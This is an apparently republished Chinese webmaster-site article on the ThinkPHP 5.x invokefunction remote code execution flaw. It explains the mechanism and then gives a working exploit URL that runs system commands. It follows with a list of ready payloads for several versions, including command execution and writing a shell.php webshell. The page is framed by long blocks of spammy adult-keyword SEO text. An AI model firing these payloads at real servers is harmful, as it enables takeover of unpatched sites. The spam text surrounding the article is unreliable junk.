亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 腳本攻防 查看內容

thinkphp代碼執行getshell的漏洞解決

2022-9-27 10:03| 查看: 2920 |來源: 互聯網

先來簡單說說前天thinkphp官方修復的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導致的一處getshell 影響的范圍: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 導致系統被提權(你懂的) 這里附上一個自己測試的

先來簡單說說前天thinkphp官方修復的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導致的一處getshell

影響的范圍: 5.x < 5.1.31, <= 5.0.23

漏洞危害: 導致系統被提權(你懂的)

這里附上一個自己測試的 thinkphp的 鏈接  http://www.thinkphp.cn/download/1260.html  版本是5.0.22

先來講下,5.0 跟5.1的區別吧,tp5.1中引入了容器(Container)和門面(Facade)這兩個新的類  tp5.0是沒有這兩個新的類的,

漏洞原理

URL:http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction

我們先來看看App類里的 exec函數里的執行分層控制器的操作

我們這里是把controller 的調用信息跟配置信息全部傳到了 invokeFunction 這個 執行函數里面去了

因為think\App是第二個入口,在tp運行的時候就會被加載 所以用think\App里面的分層控制器的執行操作的時候,需要去調用invokeFunction這個函數。

這個函數有兩個參數,如上圖所示,第一個是函數的名字,第二個參數數組,比如$function傳入BaiDu然后$vars傳入[12,555]就相當于調用BaiDu(12,555)

此處我們把function傳入call_user_func_array然后vars[0]傳入我們要執行的函數的名字vars[1]傳入要執行函數的參數,因為vars是個數組 所以此處我們的get請求需要這樣寫

[code] vars[]=函數名&vars[1][]=參數[/code]

此處是利用php的數組注入

此時此刻就可以開始利用遠程代碼執行漏洞了 比如我們要執行system函數 他的參數是whoami

http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

下面你懂的,作為一個接班人我們要做的就是修復他(為所欲為?),當然官方更新的最新版本是已經修復了的

這里就代碼執行成功,以下奉獻上tp不同版本的payload

[code] ?s=index/\think\Request/input&filter=phpinfo&data=1 ?s=index/\think\Request/input&filter=system&data=id ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content= ?s=index/\think\view\driver\Php/display&content= ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id[/code]

以上就是本文的全部內容,希望對大家的學習有所幫助,也希望大家多多支持17站長網。

本文最后更新于 2022-9-27 10:03,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        国产亚洲精品aa| 久久免费电影网| 国产欧美精品一区二区三区四区 | 精品视频一区三区九区| 91久久精品一区二区三| 精品日产卡一卡二卡麻豆| 中文字幕欧美一区| 精品在线一区二区| 欧美日本国产视频| 亚洲精品自拍动漫在线| 国产高清在线精品| 欧美成人在线直播| 日韩精品免费专区| 欧美日韩视频专区在线播放| 亚洲欧美影音先锋| 成人免费视频视频| 欧美高清在线视频| 粉嫩蜜臀av国产精品网站| 精品国产乱码91久久久久久网站| 日日摸夜夜添夜夜添亚洲女人| 91精品办公室少妇高潮对白| 综合久久给合久久狠狠狠97色| 国产精品99久久久久久久女警 | 国产一区二区三区观看| 欧美岛国在线观看| 久久爱www久久做| 精品国产亚洲在线| 狠狠久久亚洲欧美| 国产女主播一区| 成人国产在线观看| 亚洲激情综合网| 欧美日韩国产免费| 另类专区欧美蜜桃臀第一页| 欧美不卡123| 国产69精品久久久久毛片| 欧美激情中文字幕| 色婷婷亚洲一区二区三区| 一区二区三区四区亚洲| 欧美人与z0zoxxxx视频| 六月丁香婷婷久久| 国产精品电影一区二区| 欧美在线一区二区| 久久av资源网| 亚洲天堂免费在线观看视频| 欧美色图在线观看| 激情综合一区二区三区| 国产精品免费久久久久| 欧美综合一区二区三区| 麻豆精品久久久| 国产日韩欧美一区二区三区乱码| aa级大片欧美| 亚洲高清免费观看| 2020国产精品久久精品美国| 波多野结衣中文字幕一区二区三区 | 国产婷婷精品av在线| 丰满放荡岳乱妇91ww| 婷婷综合在线观看| 国产精品天干天干在观线| 精品婷婷伊人一区三区三| 国产一区二区视频在线| 亚洲一级二级在线| 久久精品免视看| 欧美美女bb生活片| 99久久精品99国产精品| 久久精品国产99国产精品| 亚洲女与黑人做爰| 久久蜜臀中文字幕| 欧美高清视频不卡网| av电影在线不卡| 国产九色sp调教91| 免费一级欧美片在线观看| 亚洲精选免费视频| 国产精品情趣视频| 精品少妇一区二区三区在线视频| 一本色道久久综合亚洲91| 国产精品亚洲а∨天堂免在线| 亚洲成人777| 一区二区三区高清在线| 国产欧美综合在线| 欧美成人免费网站| 日韩一区二区免费在线观看| 91国偷自产一区二区开放时间| 国产不卡一区视频| 国产伦精品一区二区三区在线观看 | 久久精品欧美一区二区三区不卡| 欧美亚洲精品一区| 欧美在线一二三四区| 99久久免费视频.com| 成人app软件下载大全免费| 国产一区二区三区久久悠悠色av | 亚洲综合久久久| 一级日本不卡的影视| 亚洲男人天堂一区| 亚洲卡通动漫在线| 亚洲高清免费一级二级三级| 亚洲电影第三页| 奇米综合一区二区三区精品视频| 亚洲成a人片在线观看中文| 亚洲国产成人av| 日本人妖一区二区| 激情五月婷婷综合网| 国产一区999| www.欧美日韩| 欧美羞羞免费网站| 日韩精品一区二区三区四区视频 | 国产在线视频一区二区| 国产精品99久久久久久似苏梦涵 | 香蕉乱码成人久久天堂爱免费| 亚洲综合丁香婷婷六月香| 亚洲最新视频在线播放| 午夜电影网亚洲视频| 麻豆久久久久久久| www.av亚洲| 欧美巨大另类极品videosbest| 欧美成人一区二区三区片免费| 国产亚洲综合av| 亚洲成人自拍一区| 国产精品1区2区3区在线观看| av爱爱亚洲一区| 日韩一级精品视频在线观看| 国产网站一区二区| 亚洲综合精品自拍| 成人在线一区二区三区| 欧美日韩国产三级| 国产精品免费免费| 久久99精品久久久久久久久久久久| 国产精品一区三区| 91精品免费在线| 中文字幕一区二区三区在线观看| 天堂av在线一区| 成人av片在线观看| 精品国产91洋老外米糕| 综合中文字幕亚洲| 激情图片小说一区| 欧美日高清视频| 亚洲精品国产品国语在线app| 精品一区二区日韩| 欧美视频一区二区| 亚洲色图欧洲色图| 成人黄色在线视频| 久久久久久久久久美女| 日韩1区2区3区| 欧美性xxxxxxxx| 亚洲精品国久久99热| 成人在线一区二区三区| 亚洲精品一区二区三区四区高清| 一区二区三区精品在线| a亚洲天堂av| 国产精品久久三区| 成人网在线免费视频| 久久久久久久久久久久久女国产乱 | 精品中文字幕一区二区小辣椒| 欧美日韩成人综合天天影院 | 亚洲欧美日韩电影| 99精品久久99久久久久| 中文字幕av不卡| 国产成人欧美日韩在线电影| 久久综合久色欧美综合狠狠| 蜜桃在线一区二区三区| 欧美一区二区三区成人| 美日韩黄色大片| 日韩欧美久久一区| 国产精品中文字幕一区二区三区| 日韩免费一区二区三区在线播放| 日本女优在线视频一区二区| 欧美一级日韩不卡播放免费| 免费在线一区观看| 2020日本不卡一区二区视频| 国产成人aaa| 亚洲欧洲制服丝袜| 欧美日韩免费不卡视频一区二区三区| 樱桃视频在线观看一区| 欧美日韩国产综合视频在线观看 | 亚州成人在线电影| 日韩美女视频一区二区在线观看| 久久精品国产精品亚洲综合| 久久青草国产手机看片福利盒子 | 狠狠色丁香婷婷综合| 欧美国产欧美综合| 成人精品视频一区二区三区 | 亚洲欧美怡红院| 欧美日韩在线精品一区二区三区激情 | 国产精品国产三级国产三级人妇 | 蜜臀国产一区二区三区在线播放| 精品国内二区三区| 91偷拍与自偷拍精品| 蜜臀av一区二区在线免费观看| 亚洲国产精品传媒在线观看| 欧美午夜免费电影| 国产乱子伦一区二区三区国色天香| 中文字幕精品三区| 91精品久久久久久蜜臀| 99久久久国产精品免费蜜臀| 天堂一区二区在线免费观看| 国产婷婷色一区二区三区四区| 欧美日韩国产小视频| 91麻豆视频网站| 夫妻av一区二区| 国内精品视频一区二区三区八戒| 亚洲一区二区高清|